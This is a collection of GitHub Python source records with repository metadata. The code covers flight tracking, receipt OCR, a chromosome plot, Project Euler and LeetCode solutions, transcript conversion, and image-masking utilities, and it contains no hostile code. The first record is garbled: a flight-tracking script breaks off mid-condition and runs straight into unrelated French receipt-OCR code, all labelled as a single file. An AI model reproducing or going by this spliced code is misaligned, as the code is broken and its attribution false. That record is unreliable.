+{"seq_id": "6728447208", "text": "import requests\nimport json\nimport pandas as pd\n\n#INITIALISE\nwith open('keyfile') as keyfile:\n API_KEY = keyfile.read()\n\n# lambda for quick jupyter representation of a plane\nuseful_details = ['Source',\n 'Destination',\n 'alt',\n 'reg_number',\n 'flag',\n ]\nshow_frame = lambda df : df[useful_details].sort_values(['alt','Destination'])\n\n# If no bounding box provided, uses London\nLONDON_BOX = (51.15,-0.91,51.96,0.39)\n\n# Requests\nURL = 'https://airlabs.co/api/v9/'\nendpoint = lambda e: URL + e\n\n# Get Static Data\nwith open('airports.json') as airport_data:\n airports = json.load(airport_data)\n\n# Dictionary for turning iata_codes into airport names\n#TO DO: add cities to this\ncodes = {ap['iata_code']:ap['name'] \n for ap in airports if 'iata_code' in ap.keys()\n }\n\ndef get_local_airports(bbox=LONDON_BOX):\n output = []\n for ap in airports:\n if (bbox[0] 3.5 * taille de l'image\n\n if contours_image.si_image_bien_cadre(image, contours):\n\n # wrap_perspective\n img_redresse = imgutils.wrap_perspective(base.copy(), imgutils.contour_to_rect(rect))\n if display_image: imgutils.affiche(img_redresse)\n\n image_final = traitement_image.traitement_apres_recadrage_2(img_redresse)\n # affiche_total\n total = affiche_total(image_final)\n if display_image: ocr.affiche_rectangle_paddle(image_final, (0, 255, 0), 2)\n\n # ==================== Pas de recadrage d'image ===========================\n # si cadre détecté < 3.5 * taille de l'image\n\n else:\n image_final = traitement_image.traitement_apres_recadrage_2(base)\n # --- lecture image ------\n total = affiche_total(image_final)\n if display_image: ocr.affiche_rectangle_paddle(image_final, (0, 255, 0), 2)\n\n return total\n\n# ----------------------------------------------------------------------------------------------------------------------\n# Test le programme sur un dataset\n# ----------------------------------------------------------------------------------------------------------------------\n\ndef table_comparaison():\n df = pd.read_csv(\"table/table_de_verification_dataset.csv\", sep=';')\n for i in range(len(df)):\n num = df.loc[i, 'numero']\n print(num)\n try:\n total = main(\"dataset/\" + str(num) + \"-receipt.jpg\", False)\n # total = main(\"data_2/\" + str(num) +\".jpg\", False) #2\n except:\n total = '0'\n df.loc[i, 'total_obtenu'] = total\n df[\"result\"] = df.apply(lambda row: True if float(row[\"total\"]) == float(row[\"total_obtenu\"]) else False, axis=1)\n count = df['result'].value_counts()\n vrai = len(df[df['result'] == True])\n print('pourcentage', (int(vrai) / len(df)) * 100)\n print(df)\n print(count)\n\n# ----------------------------------------------------------------------------------------------------------------------\n# Chronomètre + Lancement fonction\n# ----------------------------------------------------------------------------------------------------------------------\n\nstart = time.time()\n\n#print(\"LE TOTAL EST : \", main(\"data/sample.jpg\", True))\n#table_comparaison()\n\nend = time.time()\nexecutionTime = end - start\nprint('Temps d\\'exécution : ', executionTime, ' s')\n", "repo_name": "maelle9/Lecture-automatique-de-facture", "sub_path": "main_traitement.py", "file_name": "main_traitement.py", "file_ext": "py", "file_size_in_byte": 3345, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 5, "dataset": "github-code", "pt": "53", "api": [{"api_name": "traitement_image.silhouette", "line_number": 13, "usage_type": "call"}, {"api_name": 
"imgutils.affiche", "line_number": 14, "usage_type": "call"}, {"api_name": "contours_image.extraction_contour", "line_number": 17, "usage_type": "call"}, {"api_name": "imgutils.affiche", "line_number": 18, "usage_type": "call"}, {"api_name": "contours_image.ten_contours", "line_number": 21, "usage_type": "call"}, {"api_name": "cv2.drawContours", "line_number": 22, "usage_type": "call"}, {"api_name": "imgutils.affiche", "line_number": 23, "usage_type": "call"}, {"api_name": "imgutils.get_receipt_contour", "line_number": 26, "usage_type": "call"}, {"api_name": "cv2.drawContours", "line_number": 27, "usage_type": "call"}, {"api_name": "imgutils.affiche", "line_number": 28, "usage_type": "call"}, {"api_name": "contours_image.si_image_bien_cadre", "line_number": 33, "usage_type": "call"}, {"api_name": "imgutils.wrap_perspective", "line_number": 36, "usage_type": "call"}, {"api_name": "imgutils.contour_to_rect", "line_number": 36, "usage_type": "call"}, {"api_name": "imgutils.affiche", "line_number": 37, "usage_type": "call"}, {"api_name": "traitement_image.traitement_apres_recadrage_2", "line_number": 39, "usage_type": "call"}, {"api_name": "find_total_amount.affiche_total", "line_number": 41, "usage_type": "call"}, {"api_name": "ocr.affiche_rectangle_paddle", "line_number": 42, "usage_type": "call"}, {"api_name": "traitement_image.traitement_apres_recadrage_2", "line_number": 48, "usage_type": "call"}, {"api_name": "find_total_amount.affiche_total", "line_number": 50, "usage_type": "call"}, {"api_name": "ocr.affiche_rectangle_paddle", "line_number": 51, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 60, "usage_type": "call"}, {"api_name": "time.time", "line_number": 81, "usage_type": "call"}, {"api_name": "time.time", "line_number": 86, "usage_type": "call"}]}
+{"seq_id": "71360384169", "text": "\"\"\"Plots the distribution of variants across the genome, stained by data source.\"\"\"\n\nimport argparse\nimport pathlib\nimport pandas as pd\n\n# plotting\nfrom matplotlib import pyplot as plt\nfrom matplotlib.collections import BrokenBarHCollection\nfrom matplotlib.lines import Line2D\n\n\ndef chromosome_collections(df, y_positions, height, **kwargs):\n \"\"\"\n Yields BrokenBarHCollection of features that can be added to an Axes\n object.\n Parameters\n ----------\n df : pandas.DataFrame\n Must at least have columns ['chrom', 'start', 'end', 'color']. If no\n column 'width', it will be calculated from start/end.\n y_positions : dict\n Keys are chromosomes, values are y-value at which to anchor the\n BrokenBarHCollection\n height : float\n Height of each BrokenBarHCollection\n Additional kwargs are passed to BrokenBarHCollection\n \"\"\"\n del_width = False\n if 'width' not in df.columns:\n del_width = True\n df['width'] = df['end'] - df['start']\n for chrom, group in df.groupby('chrom'):\n yrange = (y_positions[chrom], height)\n xranges = group[['start', 'width']].values\n yield BrokenBarHCollection(\n xranges, yrange, facecolors=group['colors'], **kwargs)\n if del_width:\n del df['width']\n\n\ndef plot_chromsome_distribution(ideo,variants,ax):\n # Height of each ideogram\n chrom_height = 0.5\n\n # Spacing between consecutive ideograms\n chrom_spacing = 1\n\n # Height of the variant track. Should be smaller than `chrom_spacing` in order to\n # fit correctly\n variant_height = 0.8\n\n # Padding between the top of a gene track and its corresponding ideogram\n variant_padding = 0.1\n\n # Decide which chromosomes to use\n chromosome_list = ['chr%s' % i for i in range(1, 23)]\n\n # Keep track of the y positions for ideograms and genes for each chromosome,\n # and the center of each ideogram (which is where we'll put the ytick labels)\n ybase = 0\n chrom_ybase = {}\n variant_ybase = {}\n chrom_centers = {}\n\n # Iterate in reverse so that items in the beginning of `chromosome_list` will\n # appear at the top of the plot\n for chrom in chromosome_list[::-1]:\n chrom_ybase[chrom] = ybase\n chrom_centers[chrom] = ybase + chrom_height / 2.\n variant_ybase[chrom] = ybase - variant_height - variant_padding\n ybase += chrom_height + chrom_spacing\n\n # Filter out chromosomes not in our list\n ideo = ideo[ideo['chrom'].apply(lambda x: x in chromosome_list)]\n\n # Add a new column for width\n ideo['width'] = ideo.end - ideo.start\n\n # Colors for different chromosome stains and variant sources\n color_lookup_ideogram = {\n 'gneg': (1., 1., 1.),\n 'gpos25': (.6, .6, .6),\n 'gpos50': (.4, .4, .4),\n 'gpos75': (.2, .2, .2),\n 'gpos100': (0., 0., 0.),\n 'acen': (.8, .4, .4),\n 'gvar': (.8, .8, .8),\n 'stalk': (.9, .9, .9),\n }\n\n color_lookup_variants = {\n 'GnomAD': '#e01b22',\n 'Eichler': '#22e01b',\n 'Biobank': '#1b28e0',\n 'DGV': '#e07a1b'\n }\n\n # Add a new column for colors\n ideo['colors'] = ideo['gieStain'].apply(lambda x: color_lookup_ideogram[x])\n\n # Same thing for the variants\n variants = variants[variants['chrom'].apply(lambda x: x in chromosome_list)]\n variants['width'] = variants.end - variants.start\n variants['colors'] = variants['origin'].apply(\n lambda x: color_lookup_variants[x])\n\n # Now all we have to do is call our function for the ideogram data...\n for collection in chromosome_collections(ideo, chrom_ybase, chrom_height, linewidths=1, edgecolors='black'):\n ax.add_collection(collection)\n\n # ...and the gene data\n for collection in 
chromosome_collections(\n variants, variant_ybase, variant_height, alpha=0.5, linewidths=0\n ):\n ax.add_collection(collection)\n\n # add custom legend\n custom_lines = [Line2D([0], [0], color=color_lookup_variants['GnomAD'], lw = 3),\n Line2D([0], [0], color=color_lookup_variants['Eichler'], lw = 3),\n Line2D([0], [0], color=color_lookup_variants['Biobank'], lw = 3),\n Line2D([0], [0], color=color_lookup_variants['DGV'], lw = 3)]\n\n ax.legend(custom_lines, ['GnomAD', 'Eichler', 'Biobank', 'DGV'],loc='lower right')\n\n # Axes tweaking\n ax.set_yticks([chrom_centers[i] for i in chromosome_list])\n ax.set_yticklabels(chromosome_list)\n ax.axis('tight')\n return ax\n\nif __name__ == \"__main__\":\n main()\n", "repo_name": "jakob-he/TADA", "sub_path": "manuscript/SCRIPTS/chromosome_plot.py", "file_name": "chromosome_plot.py", "file_ext": "py", "file_size_in_byte": 4559, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 6, "dataset": "github-code", "pt": "53", "api": [{"api_name": "matplotlib.collections.BrokenBarHCollection", "line_number": 36, "usage_type": "call"}, {"api_name": "matplotlib.lines.Line2D", "line_number": 119, "usage_type": "call"}, {"api_name": "matplotlib.lines.Line2D", "line_number": 120, "usage_type": "call"}, {"api_name": "matplotlib.lines.Line2D", "line_number": 121, "usage_type": "call"}, {"api_name": "matplotlib.lines.Line2D", "line_number": 122, "usage_type": "call"}]}
+{"seq_id": "23702820719", "text": "import time\n\nstart = time.time()\n\nfrom math import prod\n\nfrom fractions import Fraction as simplest_form\n\nnumerators = []\n\ndenominators = []\n\nfor n in range(10, 100):\n for d in range(n + 1, 100):\n f = n / d\n for a in str(n):\n for b in str(d):\n if int(a) == int(b) and int(a) != 0:\n new_n = str(n).replace(a, '', 1)\n new_d = str(d).replace(b, '', 1)\n if int(new_d) != 0 and int(new_n) / int(new_d) == f:\n numerators.append(n)\n denominators.append(d)\n break\n\nsolution = simplest_form(prod(numerators), prod(denominators))\n\nprint(solution)\n\nend = time.time()\n\n# Executes in 0.0310 seconds\nprint(end - start)\n", "repo_name": "Cikguseven/Project-Euler", "sub_path": "Solutions/33.py", "file_name": "33.py", "file_ext": "py", "file_size_in_byte": 770, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "time.time", "line_number": 3, "usage_type": "call"}, {"api_name": "fractions.Fraction", "line_number": 26, "usage_type": "call"}, {"api_name": "math.prod", "line_number": 26, "usage_type": "call"}, {"api_name": "time.time", "line_number": 30, "usage_type": "call"}]}
+{"seq_id": "35452538855", "text": "\n# https://leetcode-cn.com/problems/subsets/\n\n# https://leetcode-cn.com/problems/subsets/solution/zi-ji-by-leetcode/\n\n\n# https://leetcode-cn.com/problems/subsets/solution/hui-su-si-xiang-tuan-mie-pai-lie-zu-he-zi-ji-wen-t/\n\nfrom typing import List\n\nclass Solution:\n # 递归\n def subsets(self, nums: List[int]) -> List[List[int]]:\n n = len(nums)\n output = [[]]\n\n for num in nums:\n tmp = []\n for curr in output:\n tmp = tmp + [curr + [num]]\n output = output + tmp\n return output\n\n # 回溯\n # 幂集是所有长度从 0 到 n 所有子集的组合。\n # 回溯法是一种探索所有潜在可能性找到解决方案的算法。如果当前方案不是正确的解决方案,\n # 或者不是最后一个正确的解决方案,则回溯法通过修改上一步的值继续寻找解决方案。\n def subsetsII(self, nums:List[int]):\n def backtrack(first=0, curr=[]):\n if len(curr) == k:\n output.append(curr[:])\n\n for i in range(first, n):\n curr.append(nums[i])\n backtrack(i+1, curr)\n curr.pop()\n\n output = []\n n = len(nums)\n for k in range(n+1):\n backtrack()\n return output\n\n # bit\n def subsetsIII(self, nums:List[int]):\n n = len(nums)\n output = []\n\n for i in range(2 ** n, 2**(n+1)):\n bitmask = bin(i)[3:]\n output.append([nums[j] for j in range(n) if bitmask[j] == '1'])\n\n return output\n\n\n\n\ns = Solution()\nprint(s.subsetsIII(nums=[1,2,3]))", "repo_name": "azhu51/leetcode-practice", "sub_path": "top_interview/medium_array_78.py", "file_name": "medium_array_78.py", "file_ext": "py", "file_size_in_byte": 1462, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "typing.List", "line_number": 13, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 28, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 45, "usage_type": "name"}]}
+{"seq_id": "72032123369", "text": "#!/usr/bin/env python3\n\nimport sys, os, subprocess\nfrom fileinput import FileInput\nimport os.path\nfrom datetime import datetime, timedelta\nfrom pathlib import Path\n\n# arguments to this script:\n# - meeting number\n# - real time HH:MM when recording starts\n# - crs_id/semester of offering\nif (len(sys.argv) != 4):\n print (sys.argv[0],\"must be invoked with crs_id/semester, meeting-number, astart-time (HH:MM), and \")\n sys.exit()\n\nmtg_nbr = str(sys.argv[2]).zfill(2)\n\n# CS-428+828/202030 5 11:10\n# teaching/CS-428+828/202030/0_nonweb/zoom/talk/05*.srt\n# _data/teaching/CS-428_828/202030/transcript/talk/05.yml\n\nTALK_SRC = 'teaching/' + sys.argv[1] + '/0_nonweb/zoom/talk/' + mtg_nbr + '_otter.ai.srt'\nprint(TALK_SRC)\nTALK_DST = '_data/teaching/' + sys.argv[1].replace('+','_') + '/transcript/talk/' + mtg_nbr + '.yml'\nprint(TALK_DST)\nstarttime = sys.argv[3].split(':')\nstd = timedelta(hours=int(starttime[0]),minutes=int(starttime[1]))\n#atfilepath = sys.argv[2]\n\nwith open(TALK_SRC,'r') as atf, open(TALK_DST, 'w') as ydf:\n curr_hm_stamp = ''\n curr_speaker = ''\n new_block = 0\n for line in atf:\n line = line.strip()\n if (len(line)):\n #print(line)\n if '-->' in line:\n #print ('case: -->')\n startstop = line.split(' ')\n #print(startstop)\n #ydf.write(str(startstop) + '\\n')\n try:\n ts0 = std + datetime.strptime(startstop[0],'%H:%M:%S.%f')\n except:\n ts0 = std + datetime.strptime(startstop[0],'%H:%M:%S,%f')\n if curr_hm_stamp != ts0.strftime('%Hh%M'):\n new_block = 1\n ydf.write(ts0.strftime('%Hh%M') + ':\\n')\n ydf.write(' talks:\\n')\n curr_hm_stamp = ts0.strftime('%Hh%M')\n elif ':' in line:\n #print ('case: :')\n spoken = line.split(':')\n #print(spoken)\n if new_block == 1 or curr_speaker != spoken[0]:\n #spkr = 'SSS'\n #if (spoken[0] == 'Daryl Hepting' or spoken[0] == 'Unknown'):\n ydf.write(' - persid: ' + spoken[0] + '\\n')\n #else:\n #ydf.write(' - persid: SSS\\n')\n ydf.write(' msg: >-\\n')\n curr_speaker = spoken[0]\n #print (' \\\"' + spoken[1])\n #for i in range(2,len(spoken)):\n # print (' ' + spoken[i])\n new_block = 0\n for i in range(1,len(spoken)):\n ydf.write (' ' + spoken[i].strip() + '\\n')\n elif len(line.strip().split()) > 1 or not line.isnumeric():\n #print ('case: len(line.strip().split()) > 1 or line.isalpha()')\n if new_block == 1 :#or curr_speaker != spoken[0]:\n ydf.write(' - persid: ' + spoken[0] + '\\n')\n ydf.write(' msg: >-\\n')\n new_block = 0\n ydf.write (' ' + line.strip() + '\\n')\n", "repo_name": "dhhepting/dhhepting.github.io", "sub_path": "script/000_not-needed/transcribe-talk.py", "file_name": "transcribe-talk.py", "file_ext": "py", "file_size_in_byte": 3122, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sys.argv", "line_number": 13, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 14, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 15, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 17, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 23, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 25, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 27, "usage_type": "attribute"}, {"api_name": "datetime.timedelta", "line_number": 28, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 45, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 45, "usage_type": 
"name"}, {"api_name": "datetime.datetime.strptime", "line_number": 47, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 47, "usage_type": "name"}]}
+{"seq_id": "8547586610", "text": "import torch\nimport torch.nn.functional as F\nimport torchvision\nimport os\nfrom imagegym.config import cfg\nimport numpy as np\nimport torch\n\ndef create_fixed_mask_missingness(shape:tuple):\n \"\"\"\n use only for chairs dataset since it is always sampling 4096 points\n \"\"\"\n # assert len(x.shape) == 5 #so this is chairs\n bs, ch, h, w, d = shape\n observed_indices = random_indices(4096,h*w*d).unsqueeze(0)\n all = torch.zeros((h*w*d),dtype=bool).flatten()\n all[observed_indices]=True\n observed_mask = all.reshape(h,w,d)\n\n # observed_mask = torch.zeros_like(x,dtype=bool)\n # observed_mask[:,:,observed_indices]=True\n observed_mask = np.tile(observed_mask[np.newaxis,np.newaxis], (bs,ch,1,1,1))\n observed_mask_point = observed_mask[:,0].reshape(observed_mask.shape[0],-1) #bs,h*w\n return observed_mask, observed_mask_point\n \n\ndef random_indices(num_indices, max_idx):\n \"\"\"Generates a set of num_indices random indices (without replacement)\n between 0 and max_idx - 1.\n\n Args:\n num_indices (int): Number of indices to include.\n max_idx (int): Maximum index.\n \"\"\"\n # It is wasteful to compute the entire permutation, but it looks like\n # PyTorch does not have other functions to do this\n permutation = torch.randperm(max_idx)\n # Select first num_indices indices (this will be random since permutation is\n # random)\n return permutation[:num_indices]\n\n\ndef create_mask_missingness(x, missingness):\n \"\"\"\n :param x: input tensor of batch\n :param missingness: missingness value float\n :return: x with missingness applied\n :return: observed mask of non-missingness\n \"\"\" \n if missingness == 1:\n missing_rate = np.random.rand(1) * 0.9 \n elif missingness > 0:\n missing_rate = missingness\n missing_rate = np.random.uniform(low=0,high=missing_rate)\n elif missingness ==0:\n missing_rate = -1\n\n if len(x.shape) == 3: #shapenet\n raise NotImplementedError\n bs, h, ch = x.shape\n w=1\n observed_mask_0 = (np.random.rand(h*w)) > missing_rate\n observed_mask = np.tile(observed_mask_0[np.newaxis, :, np.newaxis], (bs,1,ch))\n observed_mask_point= None\n\n elif len(x.shape) == 4:\n bs, ch, h, w = x.shape\n observed_mask_0 = (np.random.rand(h,w)) > missing_rate\n observed_mask = np.tile(observed_mask_0[np.newaxis,np.newaxis], (bs,ch,1,1))\n observed_mask_point = observed_mask[:,0].reshape(observed_mask.shape[0],-1) #bs,h*w\n\n\n elif len(x.shape) == 5: #chairs\n observed_mask, observed_mask_point = create_fixed_mask_missingness(x.shape) \n # bs, ch, h, w, d = x.shape\n # observed_mask_0 = (np.random.rand(h,w,d)) > missing_rate\n # observed_mask = np.tile(observed_mask_0[np.newaxis,np.newaxis], (bs,ch,1,1,1))\n # observed_mask_point= None\n \n else:\n raise NotImplementedError\n \n # observed_mask_0 = (np.random.rand(h,w)) > missing_rate\n # #TODO change this it fill fail, maybe we can use cfg to get the right dims\n # observed_mask = np.tile(observed_mask_0[np.newaxis,np.newaxis], (bs,ch,1,1))\n \n return x, observed_mask, observed_mask_point\n\ndef mask_to_input(self, input:torch.Tensor, mask:torch.Tensor)-> torch.Tensor:\n '''\n Args:\n input (torch.Tensor): Shape (batch_size, num_points, coordinate_dim or channel_dim).\n coor_mask (torch.Tensor): Shape (batch_size, num_points).\n Returns:\n missing_input (torch.Tensor): Shape (batch_size, num_points_not_masked,coordinate_dim or channel_dim)\n '''\n missing_input = input[mask,:].reshape(input.shape[0],-1,input.shape[2])\n return missing_input\n\n\ndef compute_occlusion_mask(input_size, 
occlusion_type: str, occlusion_size: int):\n \"\"\"\n Args:\n input_size (tuple): Size of the input image, WxH.\n occlusion_for_task (str): Type of task for getting occlusion\n occlusion_size (tuple): Starting index, Size of the occlusion.\n Returns:\n mask (torch.Tensor): Mask of shape (*input_size).\n \"\"\"\n\n\n # w,h = input_size\n if occlusion_type is None:\n occlusion_mask = torch.ones(*input_size,dtype=bool) #bogus\n return occlusion_mask\n\n index, size = occlusion_size\n number_of_axis = len(input_size)\n\n #occlusion mask is 1s everywhere, 0 at occluded place\n\n if number_of_axis==2:\n if occlusion_type == \"inpainting\":\n occlusion_mask = torch.ones(*input_size,dtype=bool)\n occlusion_mask[index:index+size,index:index+size] = False\n\n elif occlusion_type == \"outpainting\":\n occlusion_mask = torch.zeros(*input_size,dtype=bool)\n occlusion_mask[index:index+size,index:index+size] = True\n\n elif occlusion_type == \"half\":\n occlusion_mask = torch.zeros(*input_size,dtype=bool)\n occlusion_mask[:,:input_size[-1]//2] = True\n \n elif number_of_axis==3:\n if occlusion_type == \"inpainting\":\n occlusion_mask = torch.ones(*input_size,dtype=bool)\n occlusion_mask[index:index+size,index:index+size,index:index+size] = False\n\n elif occlusion_type == \"outpainting\":\n occlusion_mask = torch.zeros(*input_size,dtype=bool)\n occlusion_mask[index:index+size,index:index+size,index:index+size] = True\n\n elif occlusion_type == \"half\":\n occlusion_mask = torch.zeros(*input_size,dtype=bool)\n occlusion_mask[:,:,:input_size[-1]//2] = True\n \n else:\n raise NotImplementedError\n\n return occlusion_mask\n\ndef apply_occlusion_mask(coordinates:torch.Tensor, features:torch.Tensor, mask: torch.Tensor):\n '''\n Args:\n coordinates (torch.Tensor): Shape (batch_size, num_points, coordinate_dim)\n features (torch.Tensor): Shape (batch_size, num_points, channel_dim)\n mask (torch.Tensor): Shape (*dim).\n Returns:\n coordinates (torch.Tensor): Shape (batch_size, num_points_not_masked, coordinate_dim).\n features (torch.Tensor): Shape (batch_size, num_points_not_masked, channel_dim).\n '''\n \n coors_masked = coordinates[:, mask.flatten(), :] # [bs, num_points_not_masked, coordinate_dim]\n features_masked = features[:, mask.flatten(), :] # [bs, num_points_not_masked, channel_dim]\n\n return coors_masked, features_masked\n\n#NOT USED\ndef compute_mask_mar(batch, is_training):\n assert cfg.dataset.missing_perc>0\n bs = batch.shape[0]\n if is_training:\n if cfg.dataset.name in [\"shapenet\"]:\n mask = batch[0,:,[0]].expand(bs,-1,-1) #torch.Size([8, 6000, 1])\n mask_point = mask[:,:,0].reshape(mask.shape[0],-1) #bs,h*w\n elif cfg.dataset.name in [\"voxels\"]:\n mask = batch[0].expand(bs,-1,-1,-1,-1) #[bs,1,32,32,32]\n mask_point = mask[:,0].reshape(mask.shape[0],-1) #bs,h*w\n else:\n mask = batch[0].expand(bs,-1,-1,-1) #[bs,ch,h,w]\n mask_point = mask[:,0].reshape(mask.shape[0],-1) #bs,h*w\n else:\n if cfg.dataset.name in [\"shapenet\"]:\n mask = torch.ones_like(batch[0,:,[0]].expand(bs,-1,-1))\n mask_point = mask[:,:,0].reshape(mask.shape[0],-1) #bs,h*w\n elif cfg.dataset.name in [\"voxels\"]:\n mask = torch.ones_like(batch[0].expand(bs,-1,-1,-1,-1))#torch.Size([4, 1, 4096])\n mask_point = mask[:,0].reshape(mask.shape[0],-1) #bs,h*w\n else:\n mask = torch.ones_like(batch[0]).expand(bs,-1,-1,-1) #[bs,ch,h,w]\n mask_point = mask[:,0].reshape(mask.shape[0],-1) #bs,h*w\n return mask, mask_point\n\n\ndef bbox2mask(self, bbox):\n \"\"\"Generate mask tensor from bbox.\n Args:\n bbox: configuration tuple, 
(top, left, height, width)\n config: Config should have configuration including IMG_SHAPES,\n MAX_DELTA_HEIGHT, MAX_DELTA_WIDTH.\n Returns:\n tf.Tensor: output with shape [B, 1, H, W]\n \"\"\"\n def npmask(bbox, ch, height, width, delta_h, delta_w):\n mask = np.zeros((1, ch, height, width), np.float32)\n # h = np.random.randint(delta_h//2+1)\n # w = np.random.randint(delta_w//2+1)\n h=delta_h\n w=delta_w\n mask[:, :, bbox[0] : bbox[0]+bbox[2],\n bbox[1] : bbox[1]+bbox[3]] = 1.\n return mask\n\n img_shape =cfg.dataset.dims\n height = img_shape[1]\n width = img_shape[2]\n\n mask = npmask(bbox, 1, height, width, 5, 5)\n \n return torch.FloatTensor(mask)\n \ndef compute_neighbors(bs,K,res,pi):\n #res is the bigger one\n #res_org = (res+1)//2\n # bs = x_rec.shape[0]\n # K = x_rec.shape[-1]\n # res = x_rec.shape[-2]\n pi = pi.permute(0,2,1).reshape(bs,K,res,res)\n conv2d = torch.nn.Conv2d(in_channels=K, out_channels=K, kernel_size=3, stride=2, bias=False,groups=K)\n weight = torch.zeros((K, 1, 3, 3),dtype=torch.float).to(cfg.device)\n # print(weight)\n weight[:,:,0,0]=1\n weight[:,:,0,-1]=1\n weight[:,:,-1,0]=1\n weight[:,:,-1,-1]=1\n # weight.requires_grad=False\n # print(weight)\n conv2d.weight = torch.nn.Parameter(weight)\n conv2d.weight.requires_grad=False\n a = conv2d(pi).detach()\n centers = np.arange(1,res,2)\n pi2 = impute_findings(a,pi,centers)\n\n conv2d2 = torch.nn.Conv2d(in_channels=K, out_channels=K, kernel_size=3, stride=1, bias=False, groups=K, padding=1)\n weight = torch.zeros((K, 1, 3, 3),dtype=torch.float).to(cfg.device)\n # print(weight)\n weight[:,:,0,1]=1\n weight[:,:,1,0]=1\n weight[:,:,1,-1]=1\n weight[:,:,-1,1]=1\n # weight.requires_grad=False\n # print(weight)\n conv2d2.weight = torch.nn.Parameter(weight)\n conv2d2.weight.requires_grad=False\n b = conv2d2(pi2).detach()\n centers = np.arange(1,res,2)\n # print(centers)\n centers2 = np.arange(0,res,2)\n # print(centers2)\n pi3 = impute_findings2(b,pi2,centers,centers2)\n return pi3\n\n\ndef impute_findings(source,target,centers):\n for x in centers:\n for y in centers:\n # print(x,y)\n # print((x-1)//2,(y-1)//2)\n target[:,:,x,y] = source[:,:,(x-1)//2,(y-1)//2]/4\n return target\n\ndef impute_findings2(source,target,centers,centers2):\n for x in centers:\n for y in centers2:\n # print(x,y)\n if y==0 or y==centers2[-1]:\n dividend = 3\n else:\n dividend = 4 \n target[:,:,x,y] = source[:,:,x,y]/dividend\n target[:,:,y,x] = source[:,:,y,x]/dividend\n return target\n\ndef neighborhood_filling(centers, prior_imputed_1:torch.Tensor, scale_pixels:int, kernel_size:int=3):\n #prior_imputed_1: (bs,all,K)\n #prior_imputed_1 = reshape\n kernel = np.zeros((scale_pixels+1,scale_pixels+1))\n kernel[0,0]=1\n kernel[0,-1]=1\n kernel[-1,0]=1\n kernel[-1,-1]=1\n kernel = np.asarray(kernel,dtype=bool)\n\n for x in centers-1:\n for y in centers-1:\n image = prior_imputed_1[:,x-scale_pixels//2:x+scale_pixels//2+1,y-scale_pixels//2:y+scale_pixels//2+1]\n result = image[:,kernel]\n values, counts = np.unique(result, return_counts=True)\n ind = np.argmax(counts)\n prior_imputed_1[x,y] = values[ind]\n\n return prior_imputed_1\n\ndef neighborhood_filling_2(centers, prior_imputed_1:torch.Tensor, scale_pixels:int, kernel_size:int=3):\n kernel = np.zeros((scale_pixels+1,scale_pixels+1))\n kernel[0,0]=1\n kernel[0,-1]=1\n kernel[-1,0]=1\n kernel[-1,-1]=1\n kernel = np.asarray(kernel,dtype=bool)\n \n for x in centers-1:\n for y in centers-1:\n image = prior_imputed_1[x-scale_pixels//2:x+scale_pixels//2+1,y-scale_pixels//2:y+scale_pixels//2+1]\n result = 
image[kernel]\n values, counts = np.unique(result, return_counts=True)\n ind = np.argmax(counts)\n prior_imputed_1[x,y] = values[ind]\n\n return prior_imputed_1", "repo_name": "bkoyuncu/vamoh", "sub_path": "imagegym/utils/mask.py", "file_name": "mask.py", "file_ext": "py", "file_size_in_byte": 12636, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 5, "dataset": "github-code", "pt": "53", "api": [{"api_name": "torch.zeros", "line_number": 16, "usage_type": "call"}, {"api_name": "numpy.tile", "line_number": 22, "usage_type": "call"}, {"api_name": "numpy.newaxis", "line_number": 22, "usage_type": "attribute"}, {"api_name": "torch.randperm", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.random.rand", "line_number": 51, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 51, "usage_type": "attribute"}, {"api_name": "numpy.random.uniform", "line_number": 54, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 54, "usage_type": "attribute"}, {"api_name": "numpy.random.rand", "line_number": 62, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 62, "usage_type": "attribute"}, {"api_name": "numpy.tile", "line_number": 63, "usage_type": "call"}, {"api_name": "numpy.newaxis", "line_number": 63, "usage_type": "attribute"}, {"api_name": "numpy.random.rand", "line_number": 68, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 68, "usage_type": "attribute"}, {"api_name": "numpy.tile", "line_number": 69, "usage_type": "call"}, {"api_name": "numpy.newaxis", "line_number": 69, "usage_type": "attribute"}, {"api_name": "torch.Tensor", "line_number": 89, "usage_type": "attribute"}, {"api_name": "torch.ones", "line_number": 114, "usage_type": "call"}, {"api_name": "torch.ones", "line_number": 124, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 128, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 132, "usage_type": "call"}, {"api_name": "torch.ones", "line_number": 137, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 141, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 145, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 153, "usage_type": "attribute"}, {"api_name": "imagegym.config.cfg.dataset", "line_number": 171, "usage_type": "attribute"}, {"api_name": "imagegym.config.cfg", "line_number": 171, "usage_type": "name"}, {"api_name": "imagegym.config.cfg.dataset", "line_number": 174, "usage_type": "attribute"}, {"api_name": "imagegym.config.cfg", "line_number": 174, "usage_type": "name"}, {"api_name": "imagegym.config.cfg.dataset", "line_number": 177, "usage_type": "attribute"}, {"api_name": "imagegym.config.cfg", "line_number": 177, "usage_type": "name"}, {"api_name": "imagegym.config.cfg.dataset", 